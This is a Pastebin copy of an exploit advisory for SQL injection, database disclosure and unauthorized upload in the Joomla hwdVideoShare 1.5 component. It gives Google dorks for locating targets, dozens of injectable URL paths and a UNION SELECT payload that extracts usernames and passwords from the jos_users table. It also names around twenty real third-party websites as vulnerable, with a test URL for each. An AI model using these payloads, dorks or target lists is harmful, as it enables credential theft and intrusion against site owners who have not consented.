Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla HWDVideoShare Components 1.5 SQL Injection / Database Disclosure / Incorrect Authorization
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : joomla.org ~ hwdmediashare.co.uk
- # Software Download Link : hwdmediashare.co.uk/hwdvideoshare
- # Software Source Files and Codes :
- github.com/rkern21/videoeditor/tree/master/administrator/components/com_hwdvideoshare
- # Software Version : 1.0 and 1.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : inurl:''/index.php?option=com_hwdvideoshare''
- intext:Joomla Video Component by hwdVideoShare
- intext:Designed & Developed by Quantum Pro 4 Information Technology
- intext:desenvolvido por MANUEL PEDREIRO
- intext:Icones por "Marcos Antonio"
- intext:Powered by hwdMediaShare
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-200 [ Information Exposure ]
- CWE-863 [ Incorrect Authorization ]
- # Similar but Old CVE 02/22/2008 : cvedetails.com/cve/CVE-2008-0916/ - CVE-2008-0916
- Note : Keep in Mind. This Exploit/Vulnerability is in more details with another version.
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010286
- ####################################################################
- # Description about Software :
- ***************************
- * hwdVideoShare was a powerful Joomla 1.5 video gallery that allowed Joomla webmasters to
- display video media in an organised and manageable layout on the internet.
- The gallery could handle the uploading, server-side processing and playback of large video
- media in all popular formats. It could also import videos from popular
- video websites such as Youtube and Vimeo.
- ####################################################################
- # Impact :
- ***********
- * SQL injection vulnerability in the HWDVideoShare (com_hwdvideoshare)
- 1.5 component for Joomla! allows remote attackers to execute arbitrary
- SQL commands via the " cat_id Itemid= pattern= hwdcorder= video_id= "
- with different parameters action to index.php and it has SQL Database Errors
- under the administrator components.
- * An attacker might be able inject and/or alter existing SQL statements which would influence the database exchange.
- * It fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- * Exploiting this issue could allow an attacker to compromise the application, read,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
- * This software hwdVideoShare performs an authorization check when an actor attempts to access
- a resource or perform an action, but it does not correctly perform the check.
- This allows attackers to bypass intended access restrictions.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /administrator/components/com_hwdvideoshare/libraries/warp/infin-lib.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.nusoap_base.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_fault.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_parser.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_server.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_transport_http.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soap_val.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.soapclient.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.wsdl.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.wsdlcache.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/class.xmlschema.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/warp/nusoap/nusoap.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/GIFEncoder.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/csv_iterator.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/file_management.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/maintenance_archivelogs.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/maintenance_fixerrors.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/maintenance_recount.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/mysql_backup.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/streamers.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/thumbnail.inc.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/id3/getid3.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/id3/getid3.lib.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/smarty/Config_File.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/smarty/Smarty.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/smarty/Smarty_Compiler.class.php?id=[SQL Injection]
- /administrator/components/com_hwdvideoshare/libraries/thumbnail/thumbnail.inc.php?id=[SQL Injection]
- /index.php?option=com_hwdvideoshare&Itemid=[SQL Injection]
- /index.php?option=com_hwdvideoshare&task=frontpage&Itemid=[SQL Injection]
- /index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=[SQL Injection]
- /index.php?option=com_hwdvideoshare&task=search&Itemid=[SQL Injection]
- /index.php?option=com_hwdvideoshare&task=search&Itemid=[ID-NUMBER]&pattern=[SQL Injection]
- /index.php?option=com_hwdvideoshare&task=categories&Itemid=[SQL Injection]
- /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=categories&hwdcorder=[SQL Injection]
- /index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=[ID-NUMBER]&video_id=[SQL Injection]
- /index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=[ID-NUMBER]&cat_id=[SQL Injection]
- /index.php?option=com_hwdvideoshare&task=displayresults&Itemid=
- [ID-NUMBER]&rpp=[ID-NUMBER]&sort=[ID-NUMBER]&ep=&ex=&category_id=
- [ID-NUMBER]&pattern=[SQL Injection]
- # Exploit Payload PoC :
- *********************
- /[ID-NUMBER]&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*
- ####################################################################
- # Add Video File without Authorization / Incorrect Authorization Exploit :
- **********************************************************************
- /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=upload
- /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=upload&lang=en
- # Directory File Path :
- *******************
- /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=categories
- /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=groups
- /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=frontpage
- /index.php?option=com_hwdvideoshare&Itemid=[ID-NUMBER]&task=viewvideo&video_id=[ID-NUMBER]?tmpl=component
- # Note : If websites are not vulnerable it says :
- You are not authorized to upload videos.
- ####################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_hwdvideoshare/install.mysql.nonutf8.sql
- /administrator/components/com_hwdvideoshare/install.mysql.utf8.sql
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] visionartepro.com/index.php?option=com_hwdvideoshare&task=search&Itemid=96%27
- [+] visionartepro.com/administrator/components/com_hwdvideoshare/libraries/warp/nusoap/nusoapmime.php?id=1%27
- [+] thenationalgamingleague.com/index.php?option=com_hwdvideoshare&Itemid=243%27
- [+] thenationalgamingleague.com/administrator/components/com_hwdvideoshare/install.mysql.utf8.sql
- [+] kondicionitrening.com/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=67&video_id=44%27
- [+] cypruscommunitymedia.org/index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=66&cat_id=5%27
- [+] canal44.tv/canal44-2-0-1/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=109&video_id=15%27
- [+] super.besteciler.com/index.php?Itemid=78&option=com_hwdvideoshare&task=viewvideo&video_id=13%27
- [+] sijpa.org/index.php?option=com_hwdvideoshare&Itemid=24%27
- [+] mustang.is/~mustan13/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=41&video_id=166%27
- [+] redrecicladores.net/2015/backup/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=89&video_id=15%27
- [+] globalclimbing.net/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=78&video_id=132%27
- [+] almuslimalmuaser.org/index.php?option=com_hwdvideoshare&task=categories&Itemid=129%27
- [+] lineprosperity.ru/index.php/index.php?option=com_hwdvideoshare&task=viewcategory&Itemid=51&cat_id=30%27
- [+] buenobr.com.br/blog/index.php?option=com_hwdvideoshare&Itemid=57&task=categories&hwdcorder=1%27
- [+] tonyromano.info/index.php?option=com_hwdvideoshare&task=displayresults
- &Itemid=4&rpp=0&sort=0&ep=&ex=&category_id=0&pattern=1%27
- [+] rallyrace.it/2009/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=93&video_id=7%27
- [+] lnx.dehonianos.org/pjuvenilv/index.php?option=com_hwdvideoshare&Itemid=30%27
- [+] qapsites.com.br/coophalis/index.php?option=com_hwdvideoshare&task=search&Itemid=54&pattern=1%27
- [+] jovemguarda.com.br/50anos/index.php?option=com_hwdvideoshare&task=frontpage&Itemid=60%27
- [+] dehonianos.org/pjuvenilv/index.php?option=com_hwdvideoshare&task=viewvideo&Itemid=30&video_id=3%27
- ####################################################################
- # SQL Database Error :
- *********************
- Warning: Creating default object from empty value in
- /home/kondicio/public_html/administrator/components
- /com_hwdvideoshare/libraries/maintenance_recount.class.php on line 284
- Strict Standards: Non-static method JLoader::import() should not be
- called statically in /home/redrec26/public_html/2015/backup/libraries
- /joomla/import.php on line 29
- Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime()
- in /home/creaarte/public_html/visionartepro.com/includes/framework.php:21
- Stack trace: #0 /home/creaarte/public_html/visionartepro.com/index.php(22):
- require_once() #1 {main} thrown in /home/creaarte/public_html
- /visionartepro.com/includes/framework.php on line 21
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment